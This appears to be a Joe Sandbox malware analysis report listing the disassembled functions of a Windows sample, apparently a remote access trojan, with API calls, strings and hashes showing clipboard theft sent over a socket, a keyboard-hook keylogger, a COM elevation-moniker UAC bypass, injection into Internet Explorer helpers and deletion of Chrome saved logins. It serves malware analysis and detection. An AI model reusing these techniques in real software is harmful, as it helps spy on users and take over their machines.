                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                                                                                                              • Opcode ID: db55228f945c143f8b4a38cf357b23bed3cff89228339865896ae8425b8d91ca
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db55228f945c143f8b4a38cf357b23bed3cff89228339865896ae8425b8d91ca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                                                                                                                                                                                                                              Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3520204547-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c00b2d197c52d836ca2daf08e71cab218eb3e0969eaac9fc0ff3b3e9614775d5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c00b2d197c52d836ca2daf08e71cab218eb3e0969eaac9fc0ff3b3e9614775d5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                                                                                                                                                                                              Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-3177665633
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1454140784696b8eca5c98d65fe60e0f75817a8e4d5a0874b1dc9c73a07d707a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1454140784696b8eca5c98d65fe60e0f75817a8e4d5a0874b1dc9c73a07d707a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                                                                                                                                                                                                                              Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                                                                                                                                              • String ID: X[G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1888522110-739899062
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                                                                                                                                                                                                                              Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Object_wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                                                                                                                                              • API String ID: 240030777-3166923314
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                                                                                                                                                                                                                              Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                                                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00419945
                                                                                                                                                                                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3587775597-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 62dafbeac266ace1d3c18a5c1ba3b21fdf5b14093998f5522bbd6f80d4288692
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62dafbeac266ace1d3c18a5c1ba3b21fdf5b14093998f5522bbd6f80d4288692
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                                                                                                                                                                                                                              Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                                                                                                                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                                                                                                                              • String ID: Keylogger initialization failure: error $`#v
                                                                                                                                                                                                                                                                                                                              • API String ID: 3219506041-3226811161
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3936cb7d886cfdb0f9a11d9c606cee05680a3b014fdd5829d7790549fb62b481
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3936cb7d886cfdb0f9a11d9c606cee05680a3b014fdd5829d7790549fb62b481
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                                                                                                                                                                                                                              Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2341273852-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                                                                                                                                                                                                                              Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 845bd35451055bca7e0d51cc848ed5da177064cfe79dd4f1a0049243af527884
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 845bd35451055bca7e0d51cc848ed5da177064cfe79dd4f1a0049243af527884
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                                                                                                                                                              Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 010bd5c6ab87213fe13cad3c7d4c463c4a6ac2e7af963d8fc7983f8f2a6cfcc4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
